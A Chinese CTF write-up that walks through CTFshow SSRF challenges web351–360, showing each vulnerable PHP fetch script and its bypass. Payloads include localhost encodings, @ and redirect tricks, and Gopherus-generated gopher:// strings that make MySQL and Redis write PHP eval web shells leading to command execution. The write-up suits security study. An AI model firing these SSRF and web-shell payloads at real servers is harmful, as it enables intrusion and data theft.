CTFshow-SSRF
web351:
<?php
// 开启PHP文件
error_reporting(0);
// 这行代码将PHP的错误报告级别设置为0,意味着关闭所有错误和警告的显示。这通常用于生产环境,以避免暴露敏感信息或错误信息给用户。然而,在开发过程中,保持错误报告开启是推荐的做法,以便及时发现和修复问题。
highlight_file(__FILE__);
// `highlight_file()` 函数将指定的文件(这里是当前执行的文件,由 __FILE__ 魔术常量提供)的内容作为HTML格式的高亮源代码输出。这通常用于学习或展示代码,但在生产环境中可能会导致敏感信息泄露。
$url=$_POST['url'];
// 这行代码从全局变量`$_POST`数组中获取键名为'url'的值,并将其赋值给变量`$url`。这意味着代码期望通过POST请求接收一个名为'url'的参数。
$ch=curl_init($url);
// 使用`curl_init()`函数初始化一个新的cURL会话,并将之前获取的`$url`作为参数传递给该函数。该函数返回一个cURL会话句柄,该句柄用于后续的所有cURL函数调用,并存储在变量`$ch`中。
curl_setopt($ch, CURLOPT_HEADER, 0);
// 通过`curl_setopt()`函数设置cURL传输选项。这里,`CURLOPT_HEADER`选项被设置为0,表示在获取的内容中不包含HTTP头部。这通常是可取的,因为大多数时候我们只关心HTTP响应体(即网页内容)。
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// 再次使用`curl_setopt()`函数设置cURL传输选项。这次,`CURLOPT_RETURNTRANSFER`选项被设置为1,表示将cURL执行的结果作为字符串返回,而不是直接输出。这使得我们可以将结果存储在变量中供后续使用。
$result=curl_exec($ch);
// 调用`curl_exec()`函数执行cURL会话。它会发送一个请求到`curl_init()`函数指定的URL,并返回执行结果。这里,执行结果被存储在变量`$result`中。如果请求失败,`curl_exec()`将返回`FALSE`。
curl_close($ch);
// 使用`curl_close()`函数关闭cURL会话,并释放与之关联的所有资源。这是一个好习惯,可以避免资源泄露。
echo ($result);
// 最后,使用`echo`语句输出变量`$result`的内容,即cURL请求的结果。如果请求成功,这将输出请求的网页内容;如果请求失败(并且没有进行错误处理),则不会输出任何内容(除非之前关闭了错误报告)。
?>
// 结束PHP文件
扫后台扫到了flag.php,由此,访问之后发现非本地无法访问,所以直接ssrf读文件:
url=http://127.0.0.1/flag.php
web352:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127.0.0/')){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
mixed parse_url ( string $url [, int $component = -1 ] )
本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。
这道题过滤了localhost和127.0.0,绕过方式挺多的:
url=http://0x7F.0.0.1/flag.php 16进制
url=http://0177.0.0.1/flag.php 8进制
url=http://0.0.0.0/flag.php
url=http://0/flag.php
url=http://127.127.127.127/flag.php
web353:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|127\.0\.|\。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
过滤了127.0.和句号,那么,绕过有下面的:IP地址进制转换网站
十六进制
url=http://0x7F.0.0.1/flag.php
八进制
url=http://0177.0.0.1/flag.php
10 进制整数格式
url=http://2130706433/flag.php
16 进制整数格式,还是上面那个网站转换记得前缀0x
url=http://0x7F000001/flag.php
还有一种特殊的省略模式
127.0.0.1写成127.1
用CIDR绕过localhost
url=http://127.127.127.127/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php
web354:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
if(!preg_match('/localhost|1|0|。/i', $url)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
过滤了1和0,之类可以利用解析到127.0.0.1的域名作为绕过或者302,前者:SSRF域名解析到127.0.0.1,
这里的payload :http://safe.taobao.com/flag.php。
web355:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=5)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
这里要求长度小于五,直接用http://0/flag.php去绕过。
web356:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$host=$x['host'];
if((strlen($host)<=3)){
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
}
else{
die('hacker');
}
}
else{
die('hacker');
}
?>
长度小于3,还是上一题那个payload一把梭。
web357:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if($x['scheme']==='http'||$x['scheme']==='https'){
$ip = gethostbyname($x['host']);
echo '</br>'.$ip.'</br>';
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
echo file_get_contents($_POST['url']);
}
else{
die('scheme');
}
?>
ai的解释如下:
<?php
// 关闭PHP的错误报告,这意味着任何错误或警告都不会显示给用户
error_reporting(0);
// 高亮显示当前文件的源代码。这通常用于调试目的,但在生产环境中显示源代码是不安全的。
highlight_file(__FILE__);
// 从POST请求中获取名为'url'的参数值,并将其存储在变量$url中
$url=$_POST['url'];
// 使用parse_url函数解析$url,并将解析结果存储在数组$x中
$x=parse_url($url);
// 检查$x数组中的'scheme'键是否等于'http'或'https'
// 这是为了确保只处理HTTP或HTTPS协议的URL,从而避免潜在的协议漏洞(如URL重定向攻击)
if($x['scheme']==='http'||$x['scheme']==='https'){
// 使用gethostbyname函数获取$url中主机名的IP地址,并将其存储在变量$ip中
$ip = gethostbyname($x['host']);
// 输出获取的IP地址,前面加上HTML的换行标签
echo '</br>'.$ip.'</br>';
// 使用filter_var函数和FILTER_VALIDATE_IP过滤器来验证$ip是否为有效的IP地址
// 同时,使用FILTER_FLAG_NO_PRIV_RANGE和FILTER_FLAG_NO_RES_RANGE标志来排除私有和保留的IP地址范围
// 如果$ip不是有效的非私有/非保留IP地址,则执行die函数,终止脚本执行并输出'ip!'
if(!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
die('ip!');
}
// 如果IP地址验证通过,则使用file_get_contents函数尝试从用户提交的URL中获取内容,并输出
echo file_get_contents($_POST['url']);
}
else{
// 如果$url的协议不是HTTP或HTTPS,则执行die函数,终止脚本执行并输出'scheme'
die('scheme');
}
?>
这里打302跳转,在公网服务器上写入如下代码:
<?php
header("Location: http://127.0.0.1:80/flag.php",TRUE,302);
?>
之后使用如下命令临时运行:
php -S 0.0.0.0:2333
传入url参数为:
url=http://<vps_ip>:端口
web358:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$x=parse_url($url);
if(preg_match('/^http:\/\/ctf\..*show$/i',$url)){
echo file_get_contents($url);
}
这里使用正则表达式检查$url是否以"http://ctf.“开头,并且以”.show"结尾(不区分大小写), 前面呢就利用@符号就可以绕过,后面利用get传参方式绕过:
http://ctf.@127.0.0.1/flag.php?show
web359:
随便输入了一个账号密码后,跳转到check.php文件,抓包后post出现了一个returl,由此,利用gopher协议构造攻击,利用gopherus生成gopher语句攻击。
┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus]
└─# python2 gopherus.py --exploit mysql
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
For making it work username should not be password protected!!!
Give MySQL username: root
Give query to execute: select "<?php @eval($_POST["cmd"]);?>" into outfile '/var/www/html/2.php';
Your gopher link is ready to do SSRF :
gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%4c%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%40%65%76%61%6c%28%24%5f%50%4f%53%54%5b%22%63%6d%64%22%5d%29%3b%3f%e3%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%32%2e%70%68%70%27%3b%01%00%00%00%01
-----------Made-by-SpyD3r-----------
生成的gopher协议不能直接用,需要经过url编码之后才能用:
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%254c%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2540%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2522%2563%256d%2564%2522%255d%2529%253b%253f%25e3%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2532%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501
不知道为啥,我自己的payload用不了,贴一个别人的吧:
gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2545%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2522%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2522%2501%2500%2500%2500%2501
之后访问1.php用post传一个1=system(“cat+/flag.txt”);即可。
web360:
<?php
error_reporting(0);
highlight_file(__FILE__);
$url=$_POST['url'];
$ch=curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);
curl_close($ch);
echo ($result);
?>
这么用:
┌──(root㉿MSI)-[/home/g01den/Tools/Gopherus]
└─# python2 gopherus.py --exploit redis
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Ready To get SHELL
What do you want?? (ReverseShell/PHPShell): php
Give web root location of server (default is /var/www/html):
Give PHP Payload (We have default PHP Shell): <?php eval($_post[1]);?>
Your gopher link is Ready to get PHP Shell:
gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2428%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_post%5B1%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A
When it's done you can get PHP Shell in /shell.php at the server with `cmd` as parmeter.
-----------Made-by-SpyD3r-----------
不知为啥,我的还是用不了,不过,照理来说,发送了之后访问shell.php就能rce了。